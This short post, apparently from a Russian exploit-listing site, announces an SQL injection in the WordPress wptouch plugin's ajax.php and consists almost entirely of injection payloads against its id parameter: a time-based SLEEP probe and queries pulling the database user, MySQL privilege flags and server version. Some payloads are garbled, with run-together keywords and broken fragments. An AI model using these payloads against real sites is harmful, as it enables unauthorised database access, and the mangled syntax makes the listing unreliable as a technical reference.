SQL Injection в WordPress wptouch plugin
Автор: longrifle0x 10.03.2017 08:05
Эксплойт:
--------------- (POST data) --------------- http://site.com/wp-content/plugins/wptouch/ajax.php #Exploit: id=-1; id=- AND SLEEP(5) or 1=if http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][CURRENT_USER() http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END) http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][MID((VERSION()),1,6)
Похожие уязвимости
Твитнуть |
OtherMenu
Cтатистика
SMS.копилка

Orphus
